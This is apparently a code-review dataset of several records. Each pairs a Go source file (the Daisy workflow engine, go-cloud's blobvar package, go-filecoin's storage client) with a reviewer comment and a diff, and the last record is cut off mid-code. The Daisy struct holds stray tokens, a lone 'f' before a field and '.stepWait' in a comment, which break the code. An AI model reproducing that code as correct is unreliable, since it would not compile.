typedErr(apiError, "failed to iterate buckets", err) } if bucketAttrs.Name == dBkt { return dBkt, nil } } if err := client.Bucket(dBkt).Create(ctx, project, nil); err != nil { return "", typedErr(apiError, "failed to create bucket", err) } return dBkt, nil } // TimeRecord is a type with info of a step execution time type TimeRecord struct { Name string StartTime time.Time EndTime time.Time } // Var is a type with a flexible JSON representation. A Var can be represented // by either a string, or by this struct definition. A Var that is represented // by a string will unmarshal into the struct: {Value: <string>, Required: false, Description: ""}. type Var struct { Value string Required bool `json:",omitempty"` Description string `json:",omitempty"` } // UnmarshalJSON unmarshals a Var. func (v *Var) UnmarshalJSON(b []byte) error { var s string if err := json.Unmarshal(b, &s); err == nil { v.Value = s return nil } // We can't unmarshal into Var directly as it would create an infinite loop. type aVar Var return json.Unmarshal(b, &struct{ *aVar }{aVar: (*aVar)(v)}) } // Workflow is a single Daisy workflow workflow. type Workflow struct { // Populated on New() construction. Cancel chan struct{} `json:"-"` // Workflow template fields. // Workflow name. Name string `json:",omitempty"` // Project to run in. Project string `json:",omitempty"` // Zone to run in. Zone string `json:",omitempty"` // GCS Path to use for scratch data and write logs/results to. GCSPath string `json:",omitempty"` // Path to OAuth credentials file. OAuthPath string `json:",omitempty"` // Sources used by this workflow, map of destination to source. Sources map[string]string `json:",omitempty"` // Vars defines workflow variables, substitution is done at Workflow run time. Vars map[string]Var `json:",omitempty"` Steps map[string]*Step `json:",omitempty"` // Map of steps to their dependencies. Dependencies map[string][]string `json:",omitempty"` // Default timout for each step, defaults to 10m. // Must be parsable by https://golang.org/pkg/time/#ParseDuration. DefaultTimeout string `json:",omitempty"` defaultTimeout time.Duration // Working fields. autovars map[string]string workflowDir string parent *Workflow bucket string scratchPath string sourcesPath string logsPath string outsPath string username string externalLogging bool gcsLoggingDisabled bool cloudLoggingDisabled bool stdoutLoggingDisabled bool id string Logger Logger `json:"-"` cleanupHooks []func() DError cleanupHooksMx sync.Mutex recordTimeMx sync.Mutex stepWait sync.WaitGroup logProcessHook func(string) string // Optional compute endpoint override.stepWait ComputeEndpoint string `json:",omitempty"` ComputeClient compute.Client `json:"-"` StorageClient *storage.Client `json:"-"` cloudLoggingClient *logging.Client // Resource registries. disks *diskRegistry forwardingRules *forwardingRuleRegistry firewallRules *firewallRuleRegistry images *imageRegistry machineImages *machineImageRegistry instances *instanceRegistry networks *networkRegistry subnetworks *subnetworkRegistry targetInstances *targetInstanceRegistry objects *objectRegistry snapshots *snapshotRegistry // Cache of resources machineTypeCache twoDResourceCache instanceCache twoDResourceCache diskCache twoDResourceCache subnetworkCache twoDResourceCache targetInstanceCache twoDResourceCache forwardingRuleCache twoDResourceCache imageCache oneDResourceCache imageFamilyCache oneDResourceCache machineImageCache oneDResourceCache networkCache oneDResourceCache firewallRuleCache oneDResourceCache zonesCache oneDResourceCache regionsCache oneDResourceCache licenseCache oneDResourceCache snapshotCache oneDResourceCache stepTimeRecords []TimeRecord serialControlOutputValues map[string]string serialControlOutputValuesMx sync.Mutex //Forces cleanup on error of all resources, including those marked with NoCleanup ForceCleanupOnError bool // forceCleanup is set to true when resources should be forced clean, even when NoCleanup is set to true forceCleanup bool // cancelReason provides custom reason when workflow is canceled. f cancelReason string } //DisableCloudLogging disables logging to Cloud Logging for this workflow. func (w *Workflow) DisableCloudLogging() { w.cloudLoggingDisabled = true } //DisableGCSLogging disables logging to GCS for this workflow. func (w *Workflow) DisableGCSLogging() { w.gcsLoggingDisabled = true } //DisableStdoutLogging disables logging to stdout for this workflow. func (w *Workflow) DisableStdoutLogging() { w.stdoutLoggingDisabled = true } // AddVar adds a variable set to the Workflow. func (w *Workflow) AddVar(k, v string) { if w.Vars == nil { w.Vars = map[string]Var{} } w.Vars[k] = Var{Value: v} } // AddSerialConsoleOutputValue adds an serial-output key-value pair to the Workflow. func (w *Workflow) AddSerialConsoleOutputValue(k, v string) { w.serialControlOutputValuesMx.Lock() if w.serialControlOutputValues == nil { w.serialControlOutputValues = map[string]string{} } w.serialControlOutputValues[k] = v w.serialControlOutputValuesMx.Unlock() } // GetSerialConsoleOutputValue gets an serial-output value by key. func (w *Workflow) GetSerialConsoleOutputValue(k string) string { return w.serialControlOutputValues[k] } func (w *Workflow) addCleanupHook(hook func() DError) { w.cleanupHooksMx.Lock() w.cleanupHooks = append(w.cleanupHooks, hook) w.cleanupHooksMx.Unlock() } // SetLogProcessHook sets a hook function to process log string func (w *Workflow) SetLogProcessHook(hook func(string) string) { w.logProcessHook = hook } // Validate runs validation on the workflow. func (w *Workflow) Validate(ctx context.Context) DError { if err := w.PopulateClients(ctx); err != nil { close(w.Cancel) return Errf("error populating workflow: %v", err) } if err := w.validateRequiredFields(); err != nil { close(w.Cancel) return Errf("error validating workflow: %v", err) } if err := w.populate(ctx); err != nil { close(w.Cancel) return Errf("error populating workflow: %v", err) } w.LogWorkflowInfo("Validating workflow") if err := w.validate(ctx); err != nil { w.LogWorkflowInfo("Error validating workflow: %v", err) close(w.Cancel) return err } w.LogWorkflowInfo("Validation Complete") return nil } // WorkflowModifier is a function type for functions that can modify a Workflow object. type WorkflowModifier func(*Workflow) // Run runs a workflow. func (w *Workflow) Run(ctx context.Context) error { return w.RunWithModifiers(ctx, nil, nil) } // RunWithModifiers runs a workflow with the ability to modify it before and/or after validation. func (w *Workflow) RunWithModifiers( ctx context.Context, preValidateWorkflowModifier WorkflowModifier, postValidateWorkflowModifier WorkflowModifier) (err DError) { w.externalLogging = true if preValidateWorkflowModifier != nil { preValidateWorkflowModifier(w) } if err = w.Validate(ctx); err != nil { return err } if postValidateWorkflowModifier != nil { postValidateWorkflowModifier(w) } defer w.cleanup() defer func() { if err != nil { w.forceCleanup = w.ForceCleanupOnError } }() w.LogWorkflowInfo("Workflow Project: %s", w.Project) w.LogWorkflowInfo("Workflow Zone: %s", w.Zone) w.LogWorkflowInfo("Workflow GCSPath: %s", w.GCSPath) w.LogWorkflowInfo("Daisy scratch path: https://console.cloud.google.com/storage/browser/%s", path.Join(w.bucket, w.scratchPath)) w.LogWorkflowInfo("Uploading sources") if err = w.uploadSources(ctx); err != nil { w.LogWorkflowInfo("Error uploading sources: %v", err) close(w.Cancel) return err } w.LogWorkflowInfo("Running workflow") defer func() { for k, v := range w.serialControlOutputValues { w.LogWorkflowInfo("Serial-output value -> %v:%v", k, v) } }() if err = w.run(ctx); err != nil { w.LogWorkflowInfo("Error running workflow: %v", err) return err } return nil } func (w *Workflow) recordStepTime(stepName string, startTime time.Time, endTime time.Time) { if w.parent == nil { w.recordTimeMx.Lock() w.stepTimeRecords = append(w.stepTimeRecords, TimeRecord{stepName, startTime, endTime}) w.recordTimeMx.Unlock() } else { w.parent.recordStepTime(fmt.Sprintf("%s.%s", w.Name, stepName), startTime, endTime) } } // GetStepTimeRecords returns time records of each steps func (w *Workflow) GetStepTimeRecords() []TimeRecord { return w.stepTimeRecords } func (w *Workflow) cleanup() { startTime := time.Now() w.LogWorkflowInfo("Workflow %q cleaning up (this may take up to 2 minutes).", w.Name) select { case <-w.Cancel: default: close(w.Cancel) } // Allow goroutines that are watching w.Cancel an opportunity // to detect that the workflow was cancelled and to cleanup. c := make(chan struct{}) go func() { w.stepWait.Wait() close(c) }() select { case <-c: case <-time.After(4 * time.Second): } for _, hook := range w.cleanupHooks { if err := hook(); err != nil { w.LogWorkflowInfo("Error returned from cleanup hook: %s", err) } } w.LogWorkflowInfo("Workflow %q finished cleanup.", w.Name) w.recordStepTime("workflow cleanup", startTime, time.Now()) } func (w *Workflow) genName(n string) string { name := w.Name for parent := w.parent; parent != nil; parent = parent.parent { name = parent.Name + "-" + name } prefix := name if n != "" { prefix = fmt.Sprintf("%s-%s", n, name) } if len(prefix) > 57 { prefix = prefix[0:56] } result := fmt.Sprintf("%s-%s", prefix, w.id) if len(result) > 64 { result = result[0:63] } return strings.ToLower(result) } func (w *Workflow) getSourceGCSAPIPath(s string) string { return fmt.Sprintf("%s/%s", gcsAPIBase, path.Join(w.bucket, w.sourcesPath, s)) } // PopulateClients populates the compute and storage clients for the workflow. func (w *Workflow) PopulateClients(ctx context.Context) error { // API clients instantiation. var err error computeOptions := []option.ClientOption{option.WithCredentialsFile(w.OAuthPath)} if w.ComputeEndpoint != "" { computeOptions = append(computeOptions, option.WithEndpoint(w.ComputeEndpoint)) } if w.ComputeClient == nil { w.ComputeClient, err = compute.NewClient(ctx, computeOptions...) if err != nil { return typedErr(apiError, "failed to create compute client", err) } } storageOptions := []option.ClientOption{option.WithCredentialsFile(w.OAuthPath)} if w.StorageClient == nil { w.StorageClient, err = storage.NewClient(ctx, storageOptions...) if err != nil { return err } } loggingOptions := []option.ClientOption{option.WithCredentialsFile(w.OAuthPath)} if w.externalLogging && w.cloudLoggingClient == nil { w.cloudLoggingClient, err = logging.NewClient(ctx, w.Project, loggingOptions...) if err != nil { return err } } return nil } func (w *Workflow) populateStep(ctx context.Context, s *Step) DError { if s.Timeout == "" { s.Timeout = w.DefaultTimeout } timeout, err := time.ParseDuration(s.Timeout) if err != nil { return newErr(fmt.Sprintf("failed to parse duration for workflow %v, step %v", w.Name, s.name), err) } s.timeout = timeout var derr DError var step stepImpl if step, derr = s.stepImpl(); derr != nil { return derr } return step.populate(ctx, s) } // populate does the following: // - checks that all required Vars are set. // - instantiates API clients, if needed. // - sets generic autovars and do first round of var substitution. // - sets GCS path information. // - generates autovars from workflow fields (Name, Zone, etc) and run second round of var substitution. // - sets up logger. // - runs populate on each step. func (w *Workflow) populate(ctx context.Context) DError { for k, v := range w.Vars { if v.Required && v.Value == "" { return Errf("cannot populate workflow, required var %q is unset", k) } } // Set some generic autovars and run first round of var substitution. cwd, _ := os.Getwd() now := time.Now().UTC() w.username = getUser() w.autovars = map[string]string{ "ID": w.id, "DATE": now.Format("20060102"), "DATETIME": now.Format("20060102150405"), "TIMESTAMP": strconv.FormatInt(now.Unix(), 10), "USERNAME": w.username, "WFDIR": w.workflowDir, "CWD": cwd, } var replacements []string for k, v := range w.autovars { replacements = append(replacements, fmt.Sprintf("${%s}", k), v) } for k, v := range w.Vars { replacements = append(replacements, fmt.Sprintf("${%s}", k), v.Value) } substitute(reflect.ValueOf(w).Elem(), strings.NewReplacer(replacements...)) // Parse timeout. timeout, err := time.ParseDuration(w.DefaultTimeout) if err != nil { return Errf("failed to parse timeout for workflow: %v", err) } w.defaultTimeout = timeout // Set up GCS paths. if w.GCSPath == "" { dBkt, err := daisyBkt(ctx, w.StorageClient, w.Project) if err != nil { return err } w.GCSPath = "gs://" + dBkt } bkt, p, derr := splitGCSPath(w.GCSPath) if derr != nil { return derr } w.bucket = bkt w.scratchPath = path.Join(p, fmt.Sprintf("daisy-%s-%s-%s", w.Name, now.Format("20060102-15:04:05"), w.id)) w.sourcesPath = path.Join(w.scratchPath, "sources") w.logsPath = path.Join(w.scratchPath, "logs") w.outsPath = path.Join(w.scratchPath, "outs") // Generate more autovars from workflow fields. Run second round of var substitution. w.autovars["NAME"] = w.Name w.autovars["FULLNAME"] = w.genName("") w.autovars["ZONE"] = w.Zone w.autovars["PROJECT"] = w.Project w.autovars["GCSPATH"] = w.GCSPath w.autovars["SCRATCHPATH"] = fmt.Sprintf("gs://%s/%s", w.bucket, w.scratchPath) w.autovars["SOURCESPATH"] = fmt.Sprintf("gs://%s/%s", w.bucket, w.sourcesPath) w.autovars["LOGSPATH"] = fmt.Sprintf("gs://%s/%s", w.bucket, w.logsPath) w.autovars["OUTSPATH"] = fmt.Sprintf("gs://%s/%s", w.bucket, w.outsPath) replacements = []string{} for k, v := range w.autovars { replacements = append(replacements, fmt.Sprintf("${%s}", k), v) } substitute(reflect.ValueOf(w).Elem(), strings.NewReplacer(replacements...)) // We do this here, and not in validate, as embedded startup scripts could // have what we think are daisy variables. if err := w.validateVarsSubbed(); err != nil { return err } if err := w.substituteSourceVars(ctx, reflect.ValueOf(w).Elem()); err != nil { return err } if w.Logger == nil { w.createLogger(ctx) } // Run populate on each step. for name, s := range w.Steps { s.name = name s.w = w if err := w.populateStep(ctx, s); err != nil { return Errf("error populating step %q: %v", name, err) } } return nil } // AddDependency creates a dependency of dependent on each dependency. Returns an // error if dependent or dependency are not steps in this workflow. func (w *Workflow) AddDependency(dependent *Step, dependencies ...*Step) error { if _, ok := w.Steps[dependent.name]; !ok { return fmt.Errorf("can't create dependency: step %q does not exist", dependent.name) } if w.Dependencies == nil { w.Dependencies = map[string][]string{} } for _, dependency := range dependencies { if _, ok := w.Steps[dependency.name]; !ok { return fmt.Errorf("can't create dependency: step %q does not exist", dependency.name) } if !strIn(dependency.name, w.Dependencies[dependent.name]) { // Don't add if dependency already exists. w.Dependencies[dependent.name] = append(w.Dependencies[dependent.name], dependency.name) } } return nil } func (w *Workflow) includeWorkflow(iw *Workflow) { iw.Cancel = w.Cancel iw.parent = w iw.disks = w.disks iw.forwardingRules = w.forwardingRules iw.firewallRules = w.firewallRules iw.images = w.images iw.machineImages = w.machineImages iw.instances = w.instances iw.networks = w.networks iw.subnetworks = w.subnetworks iw.targetInstances = w.targetInstances iw.snapshots = w.snapshots iw.objects = w.objects } // ID is the unique identifyier for this Workflow. func (w *Workflow) ID() string { return w.id } // NewIncludedWorkflowFromFile reads and unmarshals a workflow with the same resources as the parent. func (w *Workflow) NewIncludedWorkflowFromFile(file string) (*Workflow, error) { iw := New() w.includeWorkflow(iw) if !filepath.IsAbs(file) { file = filepath.Join(w.workflowDir, file) } if err := readWorkflow(file, iw); err != nil { return nil, err } return iw, nil } // NewStep instantiates a new, typeless step for this workflow. // The step type must be specified before running this workflow. func (w *Workflow) NewStep(name string) (*Step, error) { if _, ok := w.Steps[name]; ok { return nil, fmt.Errorf("can't create step %q: a step already exists with that name", name) } s := &Step{name: name, w: w} if w.Steps == nil { w.Steps = map[string]*Step{} } w.Steps[name] = s return s, nil } // NewSubWorkflow instantiates a new workflow as a child to this workflow. func (w *Workflow) NewSubWorkflow() *Workflow { sw := New() sw.Cancel = w.Cancel sw.parent = w return sw } // NewSubWorkflowFromFile reads and unmarshals a workflow as a child to this workflow. func (w *Workflow) NewSubWorkflowFromFile(file string) (*Workflow, error) { sw := w.NewSubWorkflow() if !filepath.IsAbs(file) { file = filepath.Join(w.workflowDir, file) } if err := readWorkflow(file, sw); err != nil { return nil, err } return sw, nil } // Print populates then pretty prints the workflow. func (w *Workflow) Print(ctx context.Context) { w.externalLogging = false if err := w.PopulateClients(ctx); err != nil { fmt.Println("Error running PopulateClients:", err) } if err := w.populate(ctx); err != nil { fmt.Println("Error running populate:", err) } b, err := json.MarshalIndent(w, "", " ") if err != nil { fmt.Println("Error marshalling workflow for printing:", err) } fmt.Println(string(b)) } func (w *Workflow) run(ctx context.Context) DError { return w.traverseDAG(func(s *Step) DError { return w.runStep(ctx, s) }) } func (w *Workflow) runStep(ctx context.Context, s *Step) DError { timeout := make(chan struct{}) go func() { time.Sleep(s.timeout) close(timeout) }() e := make(chan DError) go func() { e <- s.run(ctx) }() select { case err := <-e: return err case <-timeout: return s.getTimeoutError() } } // Concurrently traverse the DAG, running func f on each step. // Return an error if f returns an error on any step. func (w *Workflow) traverseDAG(f func(*Step) DError) DError { // waiting = steps and the dependencies they are waiting for. // running = the currently running steps. // start = map of steps' start channels/semaphores. // done = map of steps' done channels for signaling step completion. waiting := map[string][]string{} var running []string start := map[string]chan DError{} done := map[string]chan DError{} // Setup: channels, copy dependencies. for name := range w.Steps { waiting[name] = w.Dependencies[name] start[name] = make(chan DError) done[name] = make(chan DError) } // Setup: goroutine for each step. Each waits to be notified to start. for name, s := range w.Steps { go func(name string, s *Step) { // Wait for signal, then run the function. Return any errs. if err := <-start[name]; err != nil { done[name] <- err } else if err := f(s); err != nil { done[name] <- err } close(done[name]) }(name, s) } // Main signaling logic. for len(waiting) != 0 || len(running) != 0 { // If we got a Cancel signal, kill all waiting steps. // Let running steps finish. select { case <-w.Cancel: waiting = map[string][]string{} default: } // Kick off all steps that aren't waiting for anything. for name, deps := range waiting { if len(deps) == 0 { delete(waiting, name) running = append(running, name) close(start[name]) } } // Sanity check. There should be at least one running step, // but loop back through if there isn't. if len(running) == 0 { continue } // Get next finished step. Return the step error if it erred. finished, err := stepsListen(running, done) if err != nil { return err } // Remove finished step from other steps' waiting lists. for name, deps := range waiting { waiting[name] = filter(deps, finished) } // Remove finished from currently running list. running = filter(running, finished) } return nil } func (w *Workflow) isCanceled() bool { select { case <-w.Cancel: return true default: return false } } // New instantiates a new workflow. func New() *Workflow { // We can't use context.WithCancel as we use the context even after cancel for cleanup. w := &Workflow{Cancel: make(chan struct{})} // Init nil'ed fields w.Sources = map[string]string{} w.Vars = map[string]Var{} w.Steps = map[string]*Step{} w.Dependencies = map[string][]string{} w.DefaultTimeout = defaultTimeout w.autovars = map[string]string{} // Resource registries and cleanup. w.disks = newDiskRegistry(w) w.forwardingRules = newForwardingRuleRegistry(w) w.firewallRules = newFirewallRuleRegistry(w) w.images = newImageRegistry(w) w.machineImages = newMachineImageRegistry(w) w.instances = newInstanceRegistry(w) w.networks = newNetworkRegistry(w) w.subnetworks = newSubnetworkRegistry(w) w.objects = newObjectRegistry(w) w.targetInstances = newTargetInstanceRegistry(w) w.snapshots = newSnapshotRegistry(w) w.addCleanupHook(func() DError { w.instances.cleanup() // instances need to be done before disks/networks w.images.cleanup() w.machineImages.cleanup() w.disks.cleanup() w.forwardingRules.cleanup() w.targetInstances.cleanup() w.firewallRules.cleanup() w.subnetworks.cleanup() w.networks.cleanup() w.snapshots.cleanup() return nil }) w.id = randString(5) return w } // NewFromFile reads and unmarshals a workflow file. // Recursively reads subworkflow steps as well. func NewFromFile(file string) (*Workflow, error) { w := New() if err := readWorkflow(file, w); err != nil { return nil, err } return w, nil } // JSONError turns an error from json.Unmarshal and returns a more user // friendly error. func JSONError(file string, data []byte, err error) error { // If this is a syntax error return a useful error. sErr, ok := err.(*json.SyntaxError) if !ok { return err } // Byte number where the error line starts. start := bytes.LastIndex(data[:sErr.Offset], []byte("\n")) + 1 // Assume end byte of error line is EOF unless this isn't the last line. end := len(data) if i := bytes.Index(data[start:], []byte("\n")); i >= 0 { end = start + i } // Line number of error. line := bytes.Count(data[:start], []byte("\n")) + 1 // Position of error in line (where to place the '^'). pos := int(sErr.Offset) - start if pos != 0 { pos = pos - 1 } return fmt.Errorf("%s: JSON syntax error in line %d: %s \n%s\n%s^", file, line, err, data[start:end], strings.Repeat(" ", pos)) } func readWorkflow(file string, w *Workflow) DError { data, err := ioutil.ReadFile(file) if err != nil { return newErr("failed to read workflow file", err) } w.workflowDir, err = filepath.Abs(filepath.Dir(file)) if err != nil { return newErr("failed to get absolute path of workflow file", err) } if err := json.Unmarshal(data, &w); err != nil { return newErr("failed to unmarshal workflow file", JSONError(file, data, err)) } if w.OAuthPath != "" && !filepath.IsAbs(w.OAuthPath) { w.OAuthPath = filepath.Join(w.workflowDir, w.OAuthPath) } for name, s := range w.Steps { s.name = name s.w = w } return nil } // stepsListen returns the first step that finishes/errs. func stepsListen(names []string, chans map[string]chan DError) (string, DError) { cases := make([]reflect.SelectCase, len(names)) for i, name := range names { cases[i] = reflect.SelectCase{Dir: reflect.SelectRecv, Chan: reflect.ValueOf(chans[name])} } caseIndex, value, recvOk := reflect.Select(cases) name := names[caseIndex] if recvOk { // recvOk -> a step failed, return the error. return name, value.Interface().(DError) } return name, nil } // IterateWorkflowSteps iterates over all workflow steps, including included // workflow steps, and calls cb callback function func (w *Workflow) IterateWorkflowSteps(cb func(step *Step)) { for _, step := range w.Steps { if step.IncludeWorkflow != nil { //recurse into included workflow step.IncludeWorkflow.Workflow.IterateWorkflowSteps(cb) } cb(step) } } // CancelWithReason cancels workflow with a specific reason. The specific reason replaces "is canceled" in the default error message. func (w *Workflow) CancelWithReason(reason string) { w.cancelReason = reason close(w.Cancel) } func (w *Workflow) getCancelReason() string { cancelReason := w.cancelReason for wi := w; cancelReason == "" && wi != nil; wi = wi.parent { cancelReason = wi.cancelReason } return cancelReason } func (w *Workflow) onStepCancel(s *Step, stepClass string) DError { if s == nil { return nil } cancelReason := w.getCancelReason() if cancelReason == "" { cancelReason = "is canceled" } errorMessageFormat := "Step %q (%s) " + cancelReason + "." s.w.LogWorkflowInfo(errorMessageFormat, s.name, stepClass) return Errf(errorMessageFormat, s.name, stepClass) }
1
13,354
Can this be non-exported to avoid direct use? It would be a breaking change but using previous package version would work.
GoogleCloudPlatform-compute-image-tools
go
@@ -145,7 +145,11 @@ func (w *watcher) ErrorAs(err error, i interface{}) bool { return w.bucket.ErrorAs(err, i) } -// IsNotExist implements driver.IsNotExist. -func (*watcher) IsNotExist(err error) bool { - return gcerrors.Code(err) == gcerrors.NotFound +// ErrorCode implements driver.ErrorCode. +func (*watcher) ErrorCode(err error) gcerrors.ErrorCode { + // err might have come from blob, in which case use its code. + if c := gcerrors.Code(err); c != gcerrors.Unknown { + return c + } + return gcerrors.Unknown }
1
// Copyright 2019 The Go Cloud Development Kit Authors // // Licensed under the Apache License, Version 2.0 (the "License"); // you may not use this file except in compliance with the License. // You may obtain a copy of the License at // // https://www.apache.org/licenses/LICENSE-2.0 // // Unless required by applicable law or agreed to in writing, software // distributed under the License is distributed on an "AS IS" BASIS, // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. // See the License for the specific language governing permissions and // limitations under the License. // Package blobvar provides a runtimevar implementation with // variables read from a blob.Bucket. // Use NewVariable to construct a *runtimevar.Variable. // // As // // blobvar exposes the following types for As: // - Snapshot: Not supported. // - Error: error, which can be passed to blob.ErrorAs. package blobvar // import "gocloud.dev/runtimevar/blobvar" import ( "bytes" "context" "time" "gocloud.dev/blob" "gocloud.dev/gcerrors" "gocloud.dev/runtimevar" "gocloud.dev/runtimevar/driver" ) // Options sets options. type Options struct { // WaitDuration controls the rate at which the blob is polled. // Defaults to 30 seconds. WaitDuration time.Duration } // NewVariable constructs a *runtimevar.Variable backed by the referenced blob. // Reads of the blob return raw bytes; provide a decoder to decode the raw bytes // into the appropriate type for runtimevar.Snapshot.Value. // See the runtimevar package documentation for examples of decoders. func NewVariable(bucket *blob.Bucket, key string, decoder *runtimevar.Decoder, opts *Options) (*runtimevar.Variable, error) { return runtimevar.New(newWatcher(bucket, key, decoder, opts)), nil } func newWatcher(bucket *blob.Bucket, key string, decoder *runtimevar.Decoder, opts *Options) driver.Watcher { if opts == nil { opts = &Options{} } return &watcher{ bucket: bucket, key: key, wait: driver.WaitDuration(opts.WaitDuration), decoder: decoder, } } // state implements driver.State. type state struct { val interface{} updateTime time.Time rawBytes []byte err error } // Value implements driver.State.Value. func (s *state) Value() (interface{}, error) { return s.val, s.err } // UpdateTime implements driver.State.UpdateTime. func (s *state) UpdateTime() time.Time { return s.updateTime } // As implements driver.State.As. func (s *state) As(i interface{}) bool { return false } // errorState returns a new State with err, unless prevS also represents // the same error, in which case it returns nil. func errorState(err error, prevS driver.State) driver.State { s := &state{err: err} if prevS == nil { return s } prev := prevS.(*state) if prev.err == nil { // New error. return s } if err == prev.err || err.Error() == prev.err.Error() { // Same error, return nil to indicate no change. return nil } return s } // watcher implements driver.Watcher for configurations provided by the Runtime Configurator // service. type watcher struct { bucket *blob.Bucket key string wait time.Duration decoder *runtimevar.Decoder } // WatchVariable implements driver.WatchVariable. func (w *watcher) WatchVariable(ctx context.Context, prev driver.State) (driver.State, time.Duration) { // Read the blob. b, err := w.bucket.ReadAll(ctx, w.key) if err != nil { return errorState(err, prev), w.wait } // See if it's the same raw bytes as before. if prev != nil && bytes.Equal(b, prev.(*state).rawBytes) { // No change! return nil, w.wait } // Decode the value. val, err := w.decoder.Decode(b) if err != nil { return errorState(err, prev), w.wait } return &state{val: val, updateTime: time.Now(), rawBytes: b}, w.wait } // Close implements driver.Close. func (w *watcher) Close() error { return nil } // ErrorAs implements driver.ErrorAs. // Since blobvar uses the blob package, ErrorAs delegates // to the bucket's ErrorAs method. func (w *watcher) ErrorAs(err error, i interface{}) bool { return w.bucket.ErrorAs(err, i) } // IsNotExist implements driver.IsNotExist. func (*watcher) IsNotExist(err error) bool { return gcerrors.Code(err) == gcerrors.NotFound }
1
14,031
Nit: this is just `return gcerrors.Code(err)`, isn't it?
google-go-cloud
go
@@ -189,12 +189,7 @@ func (smc *Client) ProposeDeal(ctx context.Context, miner address.Address, data // create payment information totalCost := price.MulBigInt(big.NewInt(int64(pieceSize * duration))) if totalCost.GreaterThan(types.ZeroAttoFIL) { - // The payment setup requires that the payment is mined into a block, currently we - // will wait for at most 5 blocks to be mined before giving up - ctxPaymentSetup, cancel := context.WithTimeout(ctx, 5*smc.api.BlockTime()) - defer cancel() - - cpResp, err := smc.api.CreatePayments(ctxPaymentSetup, porcelain.CreatePaymentsParams{ + cpResp, err := smc.api.CreatePayments(ctx, porcelain.CreatePaymentsParams{ From: fromAddress, To: minerOwner, Value: totalCost,
1
package storage import ( "context" "fmt" "io" "math/big" "time" "github.com/ipfs/go-cid" logging "github.com/ipfs/go-log" "github.com/libp2p/go-libp2p-core/host" "github.com/libp2p/go-libp2p-core/peer" "github.com/libp2p/go-libp2p-core/protocol" "github.com/multiformats/go-multistream" "github.com/pkg/errors" "github.com/filecoin-project/go-filecoin/actor/builtin/miner" "github.com/filecoin-project/go-filecoin/address" cbu "github.com/filecoin-project/go-filecoin/cborutil" "github.com/filecoin-project/go-filecoin/net" "github.com/filecoin-project/go-filecoin/porcelain" "github.com/filecoin-project/go-filecoin/proofs" "github.com/filecoin-project/go-filecoin/protocol/storage/storagedeal" "github.com/filecoin-project/go-filecoin/types" "github.com/filecoin-project/go-filecoin/util/convert" "github.com/filecoin-project/go-sectorbuilder" ) const ( _ = iota // ErrDuplicateDeal indicates that a deal being proposed is a duplicate of an existing deal ErrDuplicateDeal ) // Errors map error codes to messages var Errors = map[uint8]error{ ErrDuplicateDeal: errors.New("proposal is a duplicate of existing deal; if you would like to create a duplicate, add the --allow-duplicates flag"), } const ( // VoucherInterval defines how many block pass before creating a new voucher VoucherInterval = 1000 // ChannelExpiryInterval defines how long the channel remains open past the last voucher ChannelExpiryInterval = 2000 // CreateChannelGasPrice is the gas price of the message used to create the payment channel CreateChannelGasPrice = 1 // CreateChannelGasLimit is the gas limit of the message used to create the payment channel CreateChannelGasLimit = 300 ) type clientPorcelainAPI interface { BlockTime() time.Duration ChainBlockHeight() (*types.BlockHeight, error) CreatePayments(ctx context.Context, config porcelain.CreatePaymentsParams) (*porcelain.CreatePaymentsReturn, error) DealGet(context.Context, cid.Cid) (*storagedeal.Deal, error) DAGGetFileSize(context.Context, cid.Cid) (uint64, error) DAGCat(context.Context, cid.Cid) (io.Reader, error) DealPut(*storagedeal.Deal) error DealsLs(context.Context) (<-chan *porcelain.StorageDealLsResult, error) MessageQuery(ctx context.Context, optFrom, to address.Address, method string, params ...interface{}) ([][]byte, error) MinerGetAsk(ctx context.Context, minerAddr address.Address, askID uint64) (miner.Ask, error) MinerGetSectorSize(ctx context.Context, minerAddr address.Address) (*types.BytesAmount, error) MinerGetOwnerAddress(ctx context.Context, minerAddr address.Address) (address.Address, error) MinerGetWorkerAddress(ctx context.Context, minerAddr address.Address) (address.Address, error) MinerGetPeerID(ctx context.Context, minerAddr address.Address) (peer.ID, error) types.Signer PingMinerWithTimeout(ctx context.Context, p peer.ID, to time.Duration) error WalletDefaultAddress() (address.Address, error) } // Client is used to make deals directly with storage miners. type Client struct { api clientPorcelainAPI host host.Host log logging.EventLogger ProtocolRequestFunc func(ctx context.Context, protocol protocol.ID, peer peer.ID, host host.Host, request interface{}, response interface{}) error } // NewClient creates a new storage client. func NewClient(host host.Host, api clientPorcelainAPI) *Client { smc := &Client{ api: api, host: host, log: logging.Logger("storage/client"), ProtocolRequestFunc: MakeProtocolRequest, } return smc } // ProposeDeal proposes a storage deal to a miner. Pass allowDuplicates = true to // allow duplicate proposals without error. func (smc *Client) ProposeDeal(ctx context.Context, miner address.Address, data cid.Cid, askID uint64, duration uint64, allowDuplicates bool) (*storagedeal.SignedResponse, error) { pid, err := smc.api.MinerGetPeerID(ctx, miner) if err != nil { return nil, err } minerAlive := make(chan error, 1) go func() { defer close(minerAlive) minerAlive <- smc.api.PingMinerWithTimeout(ctx, pid, 15*time.Second) }() pieceSize, err := smc.api.DAGGetFileSize(ctx, data) if err != nil { return nil, errors.Wrap(err, "failed to determine the size of the data") } sectorSize, err := smc.api.MinerGetSectorSize(ctx, miner) if err != nil { return nil, errors.Wrap(err, "failed to get sector size") } maxUserBytes := go_sectorbuilder.GetMaxUserBytesPerStagedSector(sectorSize.Uint64()) if pieceSize > maxUserBytes { return nil, fmt.Errorf("piece is %d bytes but sector size is %d bytes", pieceSize, maxUserBytes) } pieceReader, err := smc.api.DAGCat(ctx, data) if err != nil { return nil, errors.Wrap(err, "failed to make piece reader") } // Generating the piece commitment is a computationally expensive operation and can take // many minutes depending on the size of the piece. pieceCommitmentResponse, err := proofs.GeneratePieceCommitment(proofs.GeneratePieceCommitmentRequest{ PieceReader: pieceReader, PieceSize: types.NewBytesAmount(pieceSize), }) if err != nil { return nil, errors.Wrap(err, "failed to generate piece commitment") } ask, err := smc.api.MinerGetAsk(ctx, miner, askID) if err != nil { return nil, errors.Wrap(err, "failed to get ask price") } price := ask.Price chainHeight, err := smc.api.ChainBlockHeight() if err != nil { return nil, err } fromAddress, err := smc.api.WalletDefaultAddress() if err != nil { return nil, err } minerOwner, err := smc.api.MinerGetOwnerAddress(ctx, miner) if err != nil { return nil, err } minerWorker, err := smc.api.MinerGetWorkerAddress(ctx, miner) if err != nil { return nil, err } totalPrice := price.MulBigInt(big.NewInt(int64(pieceSize * duration))) proposal := &storagedeal.Proposal{ PieceRef: data, Size: types.NewBytesAmount(pieceSize), TotalPrice: totalPrice, Duration: duration, MinerAddress: 